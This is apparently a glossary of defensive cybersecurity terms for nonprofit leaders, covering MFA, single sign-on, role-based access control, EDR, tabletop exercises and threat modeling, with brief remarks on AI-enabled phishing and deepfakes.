In just a few years, generative artificial intelligence has changed much about cybersecurity. Chatbots like ChatGPT are enabling even unsophisticated hackers to sound more realistic, write in many languages, and attempt more cyberattacks with minimal effort. Sophisticated cybercriminals can use existing images, voice recordings, and even videos to make so-called deepfakes, creating convincing digital replicas that can, for example, mimic an executive on a Zoom call.
However, generative A.I. also can enhance cybersecurity by quickly identifying and defending against unusual activity, and it is integrated into platforms such as Microsoft Office 365 and Google Workspace.
To keep up with advancements in cybersecurity, leaders need to understand key terms and concepts. This glossary of common cybersecurity terms will help.
Cybersecurity Frameworks
For organizations just beginning to design a cybersecurity strategy, it can be helpful to explore cybersecurity frameworks. These are road maps for internal policies and practices that foster a culture of cybersecurity and identify protections needed for tech equipment, cloud-based applications, and data.
Popular frameworks include NIST Cybersecurity Framework and CIS Controls. These and other documents present step-by-step procedures to monitor and respond to cybersecurity threats. A framework can help a nonprofit structure its cybersecurity program with industry-accepted best practices; assess the severity of potential security risks; create processes and adopt tools to mitigate those risks; ensure stronger defenses against cyberattacks; and adhere to regulations about data protection and security.
Endpoint
In the context of cybersecurity, an endpoint is any device that can be accessed on a network. Examples of endpoints include laptops, desktops, smart phones, digital printers, wireless access points, and tablets. Endpoint security protects these devices from cyberattacks.
Endpoint Detection Response
This software is installed on laptops, desktops, and other endpoints to flag unusual activity during daily use. EDR programs do this by analyzing which applications, programs, and files a user accesses each day and what a user does once they’ve accessed them. If an EDR detects a potential cybersecurity threat, it can take action to protect any information stored on an endpoint device from attack by notifying a human of anomalous activity or even by cutting off the endpoint’s access to the network.
Identity Provider
These providers serve as a single source of truth for a user’s digital identity within an organization — verified by confirming the presence of knowledge, devices, and biometric data that are unique to the user. Often, IDPs work in concert with single-sign-on (SSO) authentication services (see below), but they can also stand alone. IDPs verify a user’s identity and confirm that the user can access applications and data stored on the cloud. Common IDPs include Google, Microsoft, Okta, and Apple.
Passwordless Authentication
By now, most of us have gotten used to creating a different password for each account we need to access. But passwordless authentication allows users to log in to their accounts without a password, such as Apple’s Face ID feature on certain iPhone models. Not only is this more convenient for users, but it also mitigates the risk of employees choosing weak passwords or using the same password across many accounts. Hackers can sometimes break into accounts by using common passwords, accessing databases of stolen credentials from the dark web, or collecting log-in information through “social engineering,” such as phishing emails. Google, Microsoft, Apple, and Okta all support passwordless authentication (sometimes called “passkeys”).
Phish-Resistant Multifactor Authentication
Multifactor authentication (MFA), which prompts a user to enter a code shared to a linked account before granting access to certain applications and files, is now ubiquitous. But phish-resistant MFA adds another layer of protection to mitigate the risk that a cybercriminal could obtain MFA codes and enter them to access a network. In addition to entering the correct code, phish-resistant MFA also verifies a user’s identify with biometrics, a personal identification number, or other passwordless authentication methods, such as a physical hardware key that the user must have in their possession.
Role-Based Access Control
Organizations take a role-based access-control approach to their internal information when they make certain data accessible only to employees with specific roles. For example, personnel information may be limited to access by a human resources director or a chief technology officer. This way, employees can access no more information than they need to do their jobs well. By limiting access to sensitive information, RBACs limit risk because fewer individuals could mistakenly grant access to a bad actor, by falling for a phishing scheme, for example. Identity providers (IDP) and single sign-on (SSO) make implementing role-based access controls much easier.
Single Sign-On
With SSO, users don’t enter a password or go through the MFA process when logging in to each application stored on the cloud. Instead, they enter through a “front door” by using their network username and password, sometimes paired with multifactor authentication (MFA). Once they’ve passed through that door, users do not need to repeatedly enter passwords to access various cloud-based applications.
Like passwordless authentication, SSO reduces the risk that an employee would use weak, easy-to-hack passwords for their accounts. It also limits the number of passwords users need to remember — a boon to employees.
Importantly, SSO allows organizations to implement RBAC (see above). Administrators can set and modify which employees have access to what information. They can even restrict access to certain applications or information by log-in location, such as within the United States. The ability to see users’ locations helps administrators spot unusual activity. This feature defends against hackers in foreign countries. Plus, the ease of modifying SSO also allows administrators to quickly shut off network access when employees change jobs or adjust their access when they start new internal positions.
Social Engineering
There are many ways cybercriminals may try to hack into a nonprofit’s network, and social engineering is one of them. The tactic involves duping recipients into sharing privileged information. Phishing attempts are a common social engineering ploy. Unfortunately, social engineering is becoming more sophisticated, thanks to artificial intelligence providing attackers with sophisticated tools that are inexpensive and easy to use. When fraudsters use stolen biometric and other personal identifiable information (PII) to create bogus videos, voicemails, and images, they can trick individuals into sharing privileged information with an unauthorized party.
Tabletop Exercise
A tabletop exercise (TTX) is a discussion-based simulation designed to test an organization’s readiness to respond to cybersecurity incidents. These exercises involve key personnel and stakeholders who gather in a controlled environment to work step-by-step through hypothetical scenarios, such as a ransomware attack or data breach. By addressing simulated challenges, participants identify strengths, weaknesses, and gaps in the organization’s incident-response plan.
Tabletop exercises are essential for refining processes, improving communication, and ensuring that staff members understand their roles during a cybersecurity event. For nonprofits, these exercises can help leaders prepare for real-world scenarios without the risk of actual system downtime or data loss.
Example Use Case: A nonprofit conducts a tabletop exercise in which it simulates a phishing attack that leads to unauthorized access of donor data. Through the exercise, the organization’s team identifies a need for improved password policies and better incident communication procedures.
RoundTable has a free guide to facilitating tabletop exercises at your organization, along with 20 prewritten scenarios.
Threat Intelligence
This term refers to the act of monitoring, analyzing, and sharing information about potential cybercrimes as well as the results of analysis during that process. Good threat intelligence enables nonprofits to prioritize security measures in response to real-world information to better stay ahead of threats to their data and tech infrastructure.
Threat Modeling
Nonprofits just beginning to assess their cybersecurity should consider threat modeling. The practice uses a framework to identify all information that needs to be protected; understand how that data is stored and shared within the organization; assess any threats to that information or weak points in its security; and take steps to guard against attacks on that data. The Electronic Frontier Foundation has a useful guide to basic threat modeling.
Joshua Peskay, a cybersecurity expert, reviewed this piece for accuracy.
